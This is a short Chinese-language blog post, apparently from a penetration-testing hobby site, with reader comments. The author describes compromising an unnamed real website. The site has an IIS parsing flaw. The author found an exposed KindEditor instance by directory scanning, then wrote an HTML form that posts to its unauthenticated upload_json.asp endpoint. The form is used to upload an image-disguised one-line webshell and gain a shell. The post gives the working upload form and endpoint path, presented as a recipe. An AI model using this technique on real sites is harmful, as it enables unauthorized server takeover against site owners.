思路决定出路

Mr.Wu 565 5

某站,经测试发现存在 IIS 解析漏洞,且支持PHP
该站程序基于 ACTCMS 可以找 0day 来渗透,但是既然发现了解析漏洞,那么也不能那么简单就放弃掉这个突破点,

网站前台并没有发现上传点,所以换了个思路,用御剑扫出来 KindEditor 编辑器,然后百度了下该编辑器,得到 KindEditor 上传后端处理地址:/editor/kindeditor/asp/upload_json.asp?dir=image
编写上传表单:

<body>
    <form action="http://xx/editor/kindeditor/asp/upload_json.asp?dir=image" method="post" enctype="multipart/form-data">
    <input type="file" name="imgFile" />
    <input type="submit" value="上传文件" />
    </form>
</body>

通过上传表单成功上传图片一句话,成功 getshell


总结一下:好吧,么有总结,其实就是随便发个文章凑下内容的啦。。

广告

打赏
发表评论 取消回复
表情 图片 链接 代码

  1. 蚂蚁
    蚂蚁 Lv 1

    求大佬的御剑字典 看数量就好给力

  2. hello
    hello Lv 1

    同时支持asp和PHP?

    • Mr.Wu
      Mr.Wu 站长

      @hello[aru_2] 不然呢?IIS解析漏洞了解一下

  3. test
    test Lv 1

    可以 可以

分享
微信
微博
QQ